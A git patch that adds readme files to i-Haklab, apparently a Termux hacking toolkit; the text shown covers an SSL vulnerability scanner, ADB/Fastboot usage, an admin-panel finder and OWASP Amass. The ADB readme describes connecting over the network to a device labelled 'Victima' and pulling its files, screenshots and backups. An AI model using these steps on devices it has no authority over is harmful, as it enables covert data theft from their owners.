From ac52dee4a9cced1a22cbf5093f5c00daee71b36c Mon Sep 17 00:00:00 2001 From: Z2l0aHViCg== Date: Sun, 8 Dec 2024 21:25:10 -0500 Subject: [PATCH] =?UTF-8?q?=F0=9F=94=AE=20:=20add?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../etc/i-Haklab/Tools/Readme/A/a2sv.md | 125 + .../i-Haklab/Tools/Readme/A/adbfastboot.md | 124 + .../etc/i-Haklab/Tools/Readme/A/adminpanel.md | 8 + .../etc/i-Haklab/Tools/Readme/A/amass.md | 398 ++ .../etc/i-Haklab/Tools/Readme/A/androbugs.md | 110 + .../etc/i-Haklab/Tools/Readme/A/aoichk.md | 75 + .../etc/i-Haklab/Tools/Readme/A/aquatone.md | 88 + .../etc/i-Haklab/Tools/Readme/B/beef.md | 18 + .../etc/i-Haklab/Tools/Readme/B/bettercap.md | 36 + .../etc/i-Haklab/Tools/Readme/B/binwalk.md | 54 + .../etc/i-Haklab/Tools/Readme/B/blackbox.md | 3 + .../etc/i-Haklab/Tools/Readme/B/botgram.md | 51 + .../etc/i-Haklab/Tools/Readme/B/burpsuite.md | 1505 +++++ .../etc/i-Haklab/Tools/Readme/C/chatgpt.md | 49 + .../etc/i-Haklab/Tools/Readme/C/clamav.md | 354 ++ .../etc/i-Haklab/Tools/Readme/C/cloudbunny.md | 93 + .../i-Haklab/Tools/Readme/C/code-server.md | 71 + .../etc/i-Haklab/Tools/Readme/C/credmap.md | 45 + .../etc/i-Haklab/Tools/Readme/C/crunch.md | 722 +++ .../i-Haklab/Tools/Readme/C/cryptovenom.md | 219 + .../etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md | 55 + .../etc/i-Haklab/Tools/Readme/D/d-tect.md | 37 + .../etc/i-Haklab/Tools/Readme/D/dex2jar.md | 33 + .../etc/i-Haklab/Tools/Readme/D/dns2tcp.md | 131 + .../etc/i-Haklab/Tools/Readme/E/embed.md | 81 + .../etc/i-Haklab/Tools/Readme/E/evilurl.md | 69 + .../etc/i-Haklab/Tools/Readme/E/exiF.md | 10 + .../etc/i-Haklab/Tools/Readme/E/exploitdb.md | 0 .../etc/i-Haklab/Tools/Readme/F/fake-sms.md | 44 + .../etc/i-Haklab/Tools/Readme/F/fbbrute.md | 1 + .../.local/etc/i-Haklab/Tools/Readme/F/fbi.md | 43 + .../etc/i-Haklab/Tools/Readme/F/ffmpeg.md | 126 + .../etc/i-Haklab/Tools/Readme/F/fuzzdb.md | 89 + .../.local/etc/i-Haklab/Tools/Readme/G/gdb.md | 4559 ++++++++++++++ .../etc/i-Haklab/Tools/Readme/G/geoip.md | 1 + .../etc/i-Haklab/Tools/Readme/G/ghost.md | 121 + .../etc/i-Haklab/Tools/Readme/G/gobuster.md | 822 +++ .../etc/i-Haklab/Tools/Readme/G/gophish.md | 60 + .../etc/i-Haklab/Tools/Readme/H/h8mail.md | 193 + .../etc/i-Haklab/Tools/Readme/H/hakku.md | 83 + .../etc/i-Haklab/Tools/Readme/H/hasher.md | 37 + .../etc/i-Haklab/Tools/Readme/H/hashid.md | 65 + .../etc/i-Haklab/Tools/Readme/H/hatcloud.md | 34 + .../etc/i-Haklab/Tools/Readme/H/hunner.md | 11 + .../etc/i-Haklab/Tools/Readme/H/hydra.md | 25 + .../etc/i-Haklab/Tools/Readme/I/i-Haklab.md | 111 + .../etc/i-Haklab/Tools/Readme/I/infoga.md | 73 + .../i-Haklab/Tools/Readme/I/ipgeolacation.md | 140 + .../i-Haklab/Tools/Readme/J/johnTheRipper.md | 187 + .../etc/i-Haklab/Tools/Readme/K/kerbrute.md | 60 + .../i-Haklab/Tools/Readme/L/localtunnel.md | 70 + .../etc/i-Haklab/Tools/Readme/L/lockphish.md | 31 + .../etc/i-Haklab/Tools/Readme/M/maltego.md | 28 + .../etc/i-Haklab/Tools/Readme/M/metasploit.md | 88 + .../etc/i-Haklab/Tools/Readme/N/neovim.md | 53 + .../etc/i-Haklab/Tools/Readme/N/ngrok.md | 5283 +++++++++++++++++ .../etc/i-Haklab/Tools/Readme/N/nikto.md | 100 + .../etc/i-Haklab/Tools/Readme/N/nmap.md | 196 + .../etc/i-Haklab/Tools/Readme/O/objection.md | 31 + .../etc/i-Haklab/Tools/Readme/O/octosuite.md | 53 + .../i-Haklab/Tools/Readme/O/orbitaldump.md | 62 + .../etc/i-Haklab/Tools/Readme/O/osintgram.md | 177 + .../i-Haklab/Tools/Readme/O/osrframework.md | 91 + .../etc/i-Haklab/Tools/Readme/P/pasterm.md | 68 + .../etc/i-Haklab/Tools/Readme/P/phomber.md | 202 + .../i-Haklab/Tools/Readme/P/phoneinfoga.md | 56 + .../i-Haklab/Tools/Readme/P/phonesploit.md | 41 + .../etc/i-Haklab/Tools/Readme/P/putty.md | 40 + .../etc/i-Haklab/Tools/Readme/P/pybelt.md | 60 + .../etc/i-Haklab/Tools/Readme/Q/quack.md | 131 + .../etc/i-Haklab/Tools/Readme/R/radare2.md | 1585 +++++ .../etc/i-Haklab/Tools/Readme/R/recon-ng.md | 17 + .../etc/i-Haklab/Tools/Readme/R/recondog.md | 59 + .../etc/i-Haklab/Tools/Readme/R/redhawk.md | 126 + .../i-Haklab/Tools/Readme/R/routersploit.md | 98 + .../etc/i-Haklab/Tools/Readme/S/saycheese.md | 21 + .../etc/i-Haklab/Tools/Readme/S/sayhello.md | 34 + .../etc/i-Haklab/Tools/Readme/S/seeker.md | 98 + .../etc/i-Haklab/Tools/Readme/S/shellphish.md | 29 + .../i-Haklab/Tools/Readme/S/shellsploit.md | 98 + .../etc/i-Haklab/Tools/Readme/S/sherlock.md | 211 + .../etc/i-Haklab/Tools/Readme/S/shodan.md | 234 + .../etc/i-Haklab/Tools/Readme/S/sigploit.md | 62 + .../i-Haklab/Tools/Readme/S/slowhttptest.md | 48 + .../etc/i-Haklab/Tools/Readme/S/snow.md | 53 + .../etc/i-Haklab/Tools/Readme/S/snscrape.md | 69 + .../etc/i-Haklab/Tools/Readme/S/spotichk.md | 73 + .../etc/i-Haklab/Tools/Readme/S/sqliv.md | 88 + .../etc/i-Haklab/Tools/Readme/S/sqlmap.md | 73 + .../etc/i-Haklab/Tools/Readme/T/tangalanga.md | 62 + .../i-Haklab/Tools/Readme/T/theblackhack.md | 39 + .../i-Haklab/Tools/Readme/T/theharvester.md | 113 + .../etc/i-Haklab/Tools/Readme/T/translate.md | 573 ++ .../etc/i-Haklab/Tools/Readme/T/trape.md | 145 + .../etc/i-Haklab/Tools/Readme/T/twifo-cli.md | 25 + .../etc/i-Haklab/Tools/Readme/U/userrecon.md | 8 + .../etc/i-Haklab/Tools/Readme/V/virustotal.md | 53 + .../etc/i-Haklab/Tools/Readme/V/vulns.md | 274 + .../etc/i-Haklab/Tools/Readme/W/webhackshl.md | 42 + .../etc/i-Haklab/Tools/Readme/W/websploit.md | 52 + .../etc/i-Haklab/Tools/Readme/W/whatweb.md | 490 ++ .../etc/i-Haklab/Tools/Readme/W/wpscan.md | 181 + .../etc/i-Haklab/Tools/Readme/X/xapt.md | 47 + .../etc/i-Haklab/Tools/Readme/X/xerosploit.md | 98 + .../.local/etc/i-Haklab/Tools/Readme/neovim | 40 +- 105 files changed, 23617 insertions(+), 11 deletions(-) create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/a2sv.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/adbfastboot.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/adminpanel.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/amass.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/androbugs.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/aoichk.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/A/aquatone.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/beef.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/bettercap.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/binwalk.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/blackbox.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/botgram.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/B/burpsuite.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/chatgpt.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/clamav.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/cloudbunny.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/code-server.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/credmap.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/crunch.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/C/cryptovenom.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/D/d-tect.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/D/dex2jar.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/D/dns2tcp.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/E/embed.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/E/evilurl.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/E/exiF.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/E/exploitdb.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/fake-sms.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbbrute.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/fbi.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/ffmpeg.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/F/fuzzdb.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/gdb.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/geoip.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/ghost.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/gobuster.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/G/gophish.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/h8mail.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hakku.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hasher.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hashid.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hatcloud.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hunner.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/H/hydra.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/I/i-Haklab.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/I/infoga.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/I/ipgeolacation.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/J/johnTheRipper.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/K/kerbrute.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/L/localtunnel.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/L/lockphish.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/M/maltego.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/M/metasploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/N/neovim.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/N/ngrok.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/N/nikto.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/N/nmap.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/objection.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/octosuite.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/orbitaldump.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/osintgram.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/O/osrframework.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/pasterm.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/phomber.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/phoneinfoga.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/phonesploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/putty.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/P/pybelt.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/Q/quack.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/radare2.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/recon-ng.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/recondog.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/redhawk.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/R/routersploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/saycheese.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sayhello.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/seeker.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/shellphish.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/shellsploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sherlock.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/shodan.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sigploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/slowhttptest.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/snow.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/snscrape.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/spotichk.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sqliv.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/S/sqlmap.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/tangalanga.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/theblackhack.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/theharvester.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/translate.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/trape.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/T/twifo-cli.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/U/userrecon.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/V/virustotal.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/V/vulns.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/W/webhackshl.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/W/websploit.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/W/whatweb.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/W/wpscan.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/X/xapt.md create mode 100755 .deb/home/.local/etc/i-Haklab/Tools/Readme/X/xerosploit.md diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/a2sv.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/a2sv.md new file mode 100755 index 00000000..a0d19a59 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/a2sv.md @@ -0,0 +1,125 @@ +[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg)](https://opensource.org/licenses/MIT) + + +## 1. A2SV? +Auto Scanning to SSL Vulnerability. + +HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc + + + +A. Support Vulnerability +``` +- CVE-2007-1858] Anonymous Cipher +- CVE-2012-4929] CRIME(SPDY) +- CVE-2014-0160] CCS Injection +- CVE-2014-0224] HeartBleed +- CVE-2014-3566] SSLv3 POODLE +- CVE-2015-0204] FREAK Attack +- CVE-2015-4000] LOGJAM Attack +- CVE-2016-0800] SSLv2 DROWN +``` + +B. Dev Plan +``` +- PLAN] SSL ACCF +- PLAN] SSL Information Analysis +``` +## 2. How to Install? +A. Download(clone) & Unpack A2SV +``` +$ git clone https://github.com/hahwul/a2sv.git +$ cd a2sv +``` +B. Install Python Package / OpenSSL + +``` +$ pip install argparse +$ pip install netaddr + +$ apt-get install openssl +``` +C. Run A2SV + +``` +$ python a2sv.py -h +``` +## 3. How to Use? +``` +usage: a2sv [-h] [-t TARGET] [-tf TARGETFILE] [-p PORT] [-m MODULE] +[-d DISPLAY] [-u] [-v] + +optional arguments: + -h, --helpshow this help message and exit + -t TARGET, --target TARGET +Target URL and IP Address + $ e.g -t 127.0.0.1 + -tf TARGETFILE, --targetfile TARGETFILE +Target file(list) URL and IP Address + $ e.g -tf ./target.list + -p PORT, --port PORT Custom Port / Default: 443 + $ e.g -p 8080 + -m MODULE, --module MODULE +Check SSL Vuln with one module +[anonymous]: Anonymous Cipher +[crime]: Crime(SPDY) +[heart]: HeartBleed +[ccs]: CCS Injection +[poodle]: SSLv3 POODLE +[freak]: OpenSSL FREAK +[logjam]: OpenSSL LOGJAM +[drown]: SSLv2 DROWN + -d DISPLAY, --display DISPLAY +Display output +[Y,y] Show output +[N,n] Hide output + -o OUT, --out OUT Result write to file + $ e.g -o /home/yourdir/result.txt + -u, --update Update A2SV (GIT) + -v, --version Show Version + +``` +[Scan SSL Vulnerability] + +``` +$ python a2sv.py -t 127.0.0.1 + +$ python a2sv.py -t 127.0.0.1 -m heartbleed + +$ python a2sv.py -t 127.0.0.1 -d n + +$ python a2sv.py -t 127.0.0.1 -p 8111 + +$ python a2sv.py -tf target_list.txt + +``` +[Update A2SV] + +``` +$ python a2sv.py -u + +$ python a2sv.py --update + +``` +## 4. Support +The answer is very slow because it's a project that I could't careful about. + +## 5. Donate + +I like coffee! I'm a coffee addict.
+ +Buy Me A Coffee + +## 6. Screen shot + + + +## 7. Code Reference Site +``` +- poodle : https://github.com/supersam654/Poodle-Checker + +- heartbleed : https://github.com/sensepost/heartbleed-poc + +- ccs injection : https://github.com/Tripwire/OpenSSL-CCS-Inject-Test + +- freak : https://gist.github.com/martinseener/d50473228719a9554e6a diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adbfastboot.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adbfastboot.md new file mode 100755 index 00000000..faa32c57 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adbfastboot.md @@ -0,0 +1,124 @@ +¿Qué es ADB y Fasboot? +Las siglas ADB significan Android Debug Bridge y se corresponden con una herramienta de software que nos permite interactuar con nuestro smartphone Android. Así, por ejemplo, a través de ADB podemos ejecutar comandos para copiar archivos desde termux al teléfono, del teléfono a Termux o reiniciar el dispositivo en el modo bootloader. + +El Fastboot también es una herramienta de software con la que podemos comunicarnos y modificar partes de un smartphone Android (conectado a través de un cable USB). Con Fastboot vamos a poder desbloquear el bootloader, flashear un recovery, flashear el firmware completo o reiniciar el dispositivo en modo recovery. + +(i-Haklab)-(~) +└──┤ adb flash all bat + +Flasheando por completo el software. +Básicamente, desde Termux con ADB podemos comunicarnos con un smartphone Android que está encendido y su sistema Android funcionando, con Fastboot podemos cominicarnos con el dispositivo Android cuando lo hemos arrancado en modo bootloader. + +Con estas dos herramientas vamos a poder cambiar profundamente el software de nuestro smartphone o por lo menos acceder a él y realizar la sustraccion de datos. Por supuesto, todo esto se hace posible a través de un cable USB para conectar el smartphone a nuestro Termux. + +Activar la depuración USB +Para que nuestro android reconozca el dispositivo necesitamos activar la depuración por USB. En Ajustes > Información del teléfono pulsaremos varias veces sobre 'Número de compilación' hasta que aparezcan las opciones de desarrollo. Ahora entraremos en estas opciones y activaremos la 'Depuración por USB'. + +ADB es una parte fundamental de Android Studio, el software para desarrollar aplicaciones en Android. Para obtener ADB en nuestro Termux solo debemos ejecutar los siguientes 5 comandos : + +Primero vamos a crear un directorio adbfiles en $HOME. +mkdir -p $HOME/adbfiles + +Posteriormente descargamos los ejecutables : +wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/bin/adb -P $PREFIX/bin/adb +wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/bin/adb.bin -P $PREFIX/bin/adb.bin +wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/bin/fastboot -P $PREFIX/bin/fastboot +wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/bin/fastboot-armeabi -P $PREFIX/bin/fastboot-armeabi + +Primeros Pasos: +1.-Conecta tu dispositivo Android y Termux con adb a una red Wi-Fi común a la que ambos puedan acceder. Ten en cuenta que no todos los puntos de acceso son adecuados; quizá necesites usar un punto de acceso cuyo firewall esté configurado correctamente para admitir adb. + +2.-Conecta el Android a Termux con adb con un cable USB. + +3.-Configura el dispositivo de destino para que busque una conexión TCP/IP en el puerto 5555 con: +(Victima)-(~) +└──┤ adb tcpip 5555 +Si no se tiene adb en el dispositivo victima utilizamos la aplicación Bugjaeger. + +4.-Desconecta el cable USB del dispositivo de destino. + +5.-Busca la dirección IP del dispositivo Android. Por ejemplo, puedes encontrar la dirección IP en Configuración > Acerca del dispositivo > Estado > Dirección IP. O desde la aplicacion Bugjaeger ennla opcion "Get wifi IP address". + +6.-Realiza la conexion via adb de Termux con el dispositivo Android. +(i-Haklab)-(~) +└──┤ adb connect :5555 + +LISTO NUESTRA CONEXION ADB..... + +Comandos ADB más importantes : +(i-Haklab)-(~) +└──┤ adb devices +Con este comando obtenemos una lista de todos los dispositivos conectados. Esto es muy útil para saber que nuestro dispositivo ha sido reconocido y en el caso de que conectemos más de un dispositivo a la vez. + +(i-Haklab)-(~) +└──┤ adb reboot +Con esta instrucción reiniciaremos nuestro teléfono. + +(i-Haklab)-(~) +└──┤ adb reboot-recovery +Para reiniciar en modo recovery, por si necesitamos instalar algún archivo zip desde aquí. + +(i-Haklab)-(~) +└──┤ adb reboot-bootloader +Para reiniciar nuestro dispositivo en modo bootloader, para poder usar el fastboot. + +(i-Haklab)-(~) +└──┤ adb logcat > logcat.txt +Con este comando vamos a poder guardar el logcat por si tenemos problemas y necesitamos ayuda. Este es el registro de todas las operaciones que realiza el dispositivo. + +(i-Haklab)-(~) +└──┤ adb push $HOME/cualquier-archivo.txt /sdcard/downloads +Este comando copia el archivo especificado desde nuestro termux hacia el smartphone. Las rutas de archivo del comando son a modo de ejemplo, por tanto se tienen que adaptar en cada caso. Primero la ruta del archivo que está en termux y luego la ruta donde lo quieres copiar en el smartphone. + +(i-Haklab)-(~) +└──┤ adb pull /sdcard/downloads/document.pdf $HOME/carpeta +Con este comando conseguimos lo contrario que con el anterior, esto es, cargar un archivo desde nuestro smartphone/tablet a Termux. De nuevo, las rutas se tienen que adaptar a cada caso. Ahora ponemos primero la ruta del archivo en el smartphone y detrás la ruta en Termux. + +(i-Haklab)-(~) +└──┤ adb shell screencap -p /sdcard/screenshot.png +(i-Haklab)-(~) +└──┤ adb pull /sdcard/screenshot.png +(i-Haklab)-(~) +└──┤ adb shell rm /sdcard/screenshot.png +Estos comandos sirven para crear una captura de pantalla de nuestro teléfono que quedará almacenada en la ruta que elijamos del smartphone. + +(i-Haklab)-(~) +└──┤ adb sideload update.zip +A través de este comando conseguimos actualizar oficialmente de forma manual nuestro smartphone. + +(i-Haklab)-(~) +└──┤ adb install "$HOME/WhatsApp.apk" +Como puedee deducir, éste sirve para instalar una APK, una aplicación, en nuestro smartphone. Para ello tenemos que indicar la ruta completa de donde se encuentra la aplicación. Las comillas son necesarias si los nombre de las carpetas o archivos tienen espacios, si no los tienen las puedes omitir. + +(i-Haklab)-(~) +└──┤ adb backup -f FullBackup.ab -apk -all +Con este comando vamos hacer una copia de seguridad de todas las aplicaciones con sus datos. En la práctica no todas las aplicaciones son compatibles con la copia de seguridad a través de ADB, así que la restauración puede ser un poco tortuosa y llena de sorpresas. + +(i-Haklab)-(~) +└──┤ adb help +Muestra en pantalla todos y cada uno de los comandos que se pueden ejecutar con ADB junto a una descripción general. + + +Comandos Fastboot más importantes + +(i-Haklab)-(~) +└──┤ fastboot devices +Con este comando obtenemos una lista de todos los dispositivos conectados. Esto es muy útil para saber que nuestro dispositivo ha sido reconocido y en el caso de que conectemos más de un dispositivo a la vez. + +(i-Haklab)-(~) +└──┤ fastboot oem unlock +Con esta instrucción vamos a poder desbloquear el bootloader del dispositivo. En algunos casos vamos a tener que añadir a esta instrucción un código de desbloqueo que nos va a facilitar el fabricante de nuestro smartphone. + +(i-Haklab)-(~) +└──┤ fastboot reboot +Para reiniciar el dispositivo de forma normal. + +(i-Haklab)-(~) +└──┤ fastboot reboot-bootloader +Para volver a reiniciar en modo bootloader y seguir usando Fastboot. + +(i-Haklab)-(~) +└──┤ fastboot flash "partición" "archivo.img" +Para flashear una partición del dispositivo como: recovery, boot, radio o system. Con esta instrucción podemos instalar un custom recovery o flashear una nuevo firmware al completo. + +# @Ivam3 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adminpanel.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adminpanel.md new file mode 100755 index 00000000..192dffdf --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/adminpanel.md @@ -0,0 +1,8 @@ +# admin_penal +#How to Use +#require python 2.7 on your ...anything +#command "chmod +x admin_panel_finder.py" +#python2 admin_panel_finder.py +now enter your website: + +||warning|| This is Only for education purpose only i am not responsiable for any bad activity. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/amass.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/amass.md new file mode 100755 index 00000000..f531a245 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/amass.md @@ -0,0 +1,398 @@ +# [![OWASP Logo](../images/owasp_logo.png) OWASP Amass](https://owasp.org/www-project-amass/) - Users' Guide + +![Network graph](../images/network_06092018.png "Amass Network Mapping") + +---- + +## Simple Examples For Getting Started + +The amass tool and all the subcommands show options using the **'-h'** and **'-help'** flags: + +```bash +amass -help +``` + +Check the version by performing the following: + +```bash +amass -version +``` + +The most basic use of the tool for subdomain enumeration: + +```bash +amass enum -d example.com +``` + +Typical parameters for DNS enumeration: + +```bash +$ amass enum -v -src -ip -brute -min-for-recursive 2 -d example.com +[Google] www.example.com +[VirusTotal] ns.example.com +... +``` + +Executing the tool via the Docker image: + +```bash +docker run -v OUTPUT_DIR_PATH:/.config/amass/ caffix/amass:latest enum --list +``` + +The volume argument allows the Amass graph database to persist between executions and output files to be accessed on the host system. The first field (left of the colon) of the volume option is the amass output directory that is external to Docker, while the second field is the path, internal to Docker, where amass will write the output files. + +## Command-line Usage Information + +The amass tool has several subcommands shown below for handling your Internet exposure investigation. + +| Subcommand | Description | +|------------|-------------| +| intel | Collect open source intelligence for investigation of the target organization | +| enum | Perform DNS enumeration and network mapping of systems exposed to the Internet | +| viz | Generate visualizations of enumerations for exploratory analysis | +| track | Compare results of enumerations against common target organizations | +| db | Manage the graph databases storing the enumeration results | + +Each subcommand has its own arguments that are shown in the following sections. + +### The 'intel' Subcommand + +The intel subcommand can help you discover additional root domain names associated with the organization you are investigating. The data source sections of the configuration file are utilized by this subcommand in order to obtain passive intelligence, such as reverse whois information. + +| Flag | Description | Example | +|------|-------------|---------| +| -active | Enable active recon methods | amass intel -active -addr 192.168.2.1-64 -p 80,443,8080 | +| -addr | IPs and ranges (192.168.1.1-254) separated by commas | amass intel -addr 192.168.2.1-64 | +| -asn | ASNs separated by commas (can be used multiple times) | amass intel -asn 13374,14618 | +| -cidr | CIDRs separated by commas (can be used multiple times) | amass intel -cidr 104.154.0.0/15 | +| -config | Path to the INI configuration file | amass intel -config config.ini | +| -d | Domain names separated by commas (can be used multiple times) | amass intel -whois -d example.com | +| -demo | Censor output to make it suitable for demonstrations | amass intel -demo -whois -d example.com | +| -df | Path to a file providing root domain names | amass intel -whois -df domains.txt | +| -dir | Path to the directory containing the graph database | amass intel -dir PATH -cidr 104.154.0.0/15 | +| -ef | Path to a file providing data sources to exclude | amass intel -whois -ef exclude.txt -d example.com | +| -exclude | Data source names separated by commas to be excluded | amass intel -whois -exclude crtsh -d example.com | +| -if | Path to a file providing data sources to include | amass intel -whois -if include.txt -d example.com | +| -include | Data source names separated by commas to be included | amass intel -whois -include crtsh -d example.com | +| -ip | Show the IP addresses for discovered names | amass intel -ip -whois -d example.com | +| -ipv4 | Show the IPv4 addresses for discovered names | amass intel -ipv4 -whois -d example.com | +| -ipv6 | Show the IPv6 addresses for discovered names | amass intel -ipv6 -whois -d example.com | +| -list | Print the names of all available data sources | amass intel -list | +| -log | Path to the log file where errors will be written | amass intel -log amass.log -whois -d example.com | +| -max-dns-queries | Maximum number of concurrent DNS queries | amass intel -max-dns-queries 200 -whois -d example.com | +| -noresolvrate | Disable resolver rate monitoring | amass intel -cidr 